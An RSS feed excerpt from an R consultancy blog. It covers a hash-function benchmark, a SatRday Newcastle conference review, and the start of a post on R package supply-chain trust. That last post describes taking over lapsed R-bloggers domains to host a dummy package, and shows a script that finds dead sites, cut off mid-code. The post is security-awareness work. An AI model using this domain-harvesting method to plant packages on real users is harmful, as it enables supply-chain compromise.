&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;replicate&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;LETTERS&lt;/span&gt;, N, replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;), collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bench&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mark&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; iterations &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, check &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; md5 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;md5&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sha1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sha1&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; crc32 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;crc32&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sha256 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sha256&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sha512 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sha512&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xxhash32 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;xxhash32&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xxhash64 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;xxhash64&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; murmur32 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(value, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;murmur32&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The tibble &lt;code&gt;results&lt;/code&gt; contain timing results. But it’s easier to work with relative timings. So we’ll rescale&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rel_timings &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; results &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(expression, median) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(expression &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(expression)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;distinct&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(median_rel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unclass&lt;/span&gt;(median&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;min&lt;/span&gt;(median)))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then plot the results, ordered by slowed to largest&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(rel_timings) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_boxplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fct_reorder&lt;/span&gt;(expression, median_rel), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; median_rel)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Relative timings&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;N = 10,000&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="digest-1.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;The &lt;code&gt;sha256&lt;/code&gt; algorithm is about three times slower than the &lt;code&gt;xxhash32&lt;/code&gt; method. However, it’s worth bearing in mind that although it’s relatively slower, the absolute times are very small&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rel_timings &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(expression) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(median &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;median&lt;/span&gt;(median)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(median))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 8 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## expression median&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;bch:tm&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 sha256 171.2µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 sha1 112.6µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 md5 109.5µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 sha512 108.4µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 crc32 91µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 xxhash64 85.1µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 murmur32 82.1µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 xxhash32 77.6µs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It’s also worth seeing how the results vary according to the size of the character string &lt;code&gt;N&lt;/code&gt;.&lt;/p&gt;
&lt;img class="image-center" src="digest-2.png" style="width:550px; class:image-center"&gt;
&lt;p&gt;Regardless of the value of &lt;code&gt;N&lt;/code&gt;, the &lt;code&gt;sha256&lt;/code&gt; algorithm is consistently in the slowest.&lt;/p&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;R is going the way of “tidy” data. Though it wasn&amp;rsquo;t the focus of this blog post, I think that the {bench} package is as good as other timing packages out there. Not only that, but it fits in with the whole “tidy” data thing. Two birds, one stone.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/digest-timings-bench-package/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Thoughts on SatRday Newcastle</title><link>https://www.jumpingrivers.com/blog/satrday-ncl-review/</link><pubDate>Wed, 15 May 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrday-ncl-review/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrday-ncl-review/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrday-ncl-review/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Earlier this month I attended the inaugural Sat&lt;strong&gt;R&lt;/strong&gt;day Newcastle. This was my first time attending a Sat&lt;strong&gt;R&lt;/strong&gt;day event, and I had a really enjoyable day. The event was sponsored by &lt;a href="https://www.ncl.ac.uk/" rel="external"&gt;Newcastle University&lt;/a&gt;, &lt;a href="https://www.sage.com/" rel="external"&gt;Sage&lt;/a&gt;, &lt;a href="https://www.rstudio.com/" rel="external"&gt;RStudio&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;. There were over 100 attendees from across the U.K. Most attendees were from industry, although there were also a couple of academics present. There were also lots of R-Ladies, including women from the newly formed &lt;a href="https://www.meetup.com/rladies-newcastle/" rel="external"&gt;R-Ladies Newcastle&lt;/a&gt;, who are launching next month. There was even a four-month-old baby - well, you’ve got to start them young!&lt;/p&gt;
&lt;img class="image-center" src="r-ladies-satrday-cropped.jpg" style="width:500px; class:image-center"&gt;
&lt;p&gt;There were lots of interesting talks during the day, but here are a couple of my personal favourites.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-satrday-ncl-review"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h4 id="noa-tamir-data-culture-in-practice"&gt;&lt;a href="http://www.noatamir.com/" rel="external"&gt;Noa Tamir&lt;/a&gt;: Data Culture in Practice.&lt;/h4&gt;
&lt;p&gt;&lt;a href="http://www.noatamir.com/" rel="external"&gt;Noa&lt;/a&gt; opened the day by telling stories about climate change, mozzarella and wisdom of the crowds. She taught us that “stories are sticky” and using them can be a great way to help colleagues understand, and remember statistical principles. She also highlighted the importance of trust, access and knowledge when working with data.&lt;/p&gt;
&lt;h4 id="joe-gallagher-football-analytics-with-the-soccermatics-package"&gt;&lt;a href="https://jogall.github.io/" rel="external"&gt;Joe Gallagher&lt;/a&gt;: Football analytics with the soccermatics package.&lt;/h4&gt;
&lt;p&gt;I don’t really follow football, but &lt;a href="https://jogall.github.io/" rel="external"&gt;Joe&lt;/a&gt;’s talk on his soccermatrics package was fascinating. He’s created a tool to visualise and analyse football matches, including pitch heatmaps and individual player trajectories. Joe has a huge list of extra functionality he would like to add and is looking for collaborators. If you would like to help develop the soccermatics package, you can reach out on &lt;a href="https://github.com/JoGall/soccermatics" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="thomas-lin-pedersen-creative-coding-for-fun-and-nonprofit"&gt;&lt;a href="https://www.data-imaginist.com/" rel="external"&gt;Thomas Lin Pedersen&lt;/a&gt;: Creative Coding for Fun and (Non)Profit.&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://www.data-imaginist.com/" rel="external"&gt;Thomas&lt;/a&gt; spoke about the benefits of creative coding, and how those little fun extra projects can provide a healthy distraction from a difficult task at hand, whilst also allowing you to learn new skills. He was, however, keen to stress that having time to code for fun is a privilege and not a requirement, so don’t worry if you don’t have time!&lt;/p&gt;
&lt;h3 id="did-you-miss-us"&gt;Did you miss us?&lt;/h3&gt;
&lt;p&gt;Don’t worry if you missed Sat&lt;strong&gt;R&lt;/strong&gt;day Newcastle, all of the talks were recorded and we will be sharing them online shortly. We’re also pleased to announce that Sat&lt;strong&gt;R&lt;/strong&gt;days Newcastle will return on &lt;strong&gt;4th April 2020&lt;/strong&gt;. Save the date!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrday-ncl-review/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Packages: Are we too trusting?</title><link>https://www.jumpingrivers.com/blog/r-packages-security-install/</link><pubDate>Mon, 04 Feb 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-packages-security-install/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-packages-security-install/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-packages-security-install/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;One of the great things about R, is the myriad of packages. Packages are typically installed via&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CRAN&lt;/li&gt;
&lt;li&gt;Bioconductor&lt;/li&gt;
&lt;li&gt;GitHub&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But how often do we think about what we are installing? Do we pay attention or just install when something looks neat? Do we think about security or just take it that everything is secure? In this post, we conducted a little nefarious experiment to see if people pay attention to what they install.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-r-packages-security-install"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="r-bloggers-the-hook"&gt;R-bloggers: The hook&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.r-bloggers.com/" rel="external"&gt;R-bloggers&lt;/a&gt; is great a resource for keeping on top of what&amp;rsquo;s happening in the world of R. It&amp;rsquo;s one the resources we recommend whenever we run &lt;a href="https://jumpingrivers.com/courses" rel="external"&gt;training courses&lt;/a&gt;. For an author to get their site syndicated to R-bloggers, they have to email Tal who will ensure that the site isn&amp;rsquo;t spammy. I recently saw a tweet (I can&amp;rsquo;t remember who from) who suggested tongue in cheek that to boost your website ranking, just grab a site that used to appear on R-bloggers.&lt;/p&gt;
&lt;p&gt;This gave me an idea for something a bit more devious! Instead of boosting website traffic, could we grab a domain, create a dummy R package, then monitor who installs this package!&lt;/p&gt;
&lt;p&gt;A list of &lt;a href="https://www.r-bloggers.com/blogs-list/" rel="external"&gt;contributing&lt;/a&gt; sites is nicely provided by R-bloggers. A quick and dirty script grabs select target domains. First we load a few packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(httr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tidyverse)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(rvest)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then extract all URLs from the page&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;page_source &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://www.r-bloggers.com/blogs-list/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_html&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;urls &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;html_attr&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;html_nodes&lt;/span&gt;(page_source, &lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;href&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With a little helper function to get the &lt;a href="https://en.wikipedia.org/wiki/List_of_HTTP_status_codes" rel="external"&gt;status code&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# If a site is available, it should return 200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;get_status_code &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(url) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; status &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;try&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;GET&lt;/span&gt;(url)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;status, silent &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;class&lt;/span&gt;(status) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;try-error&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; status &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; status
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;we simply probe each URL&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Lots of threads&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;status_codes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; parallel&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mclapply&lt;/span&gt;(urls, get_code, mc.cores &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;24&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;status_codes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;(status_codes)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In total, there were 43 URLs not returning the required status code of 200&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(urls &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; urls, status_codes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; status_codes) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(status_codes)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(status_codes &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
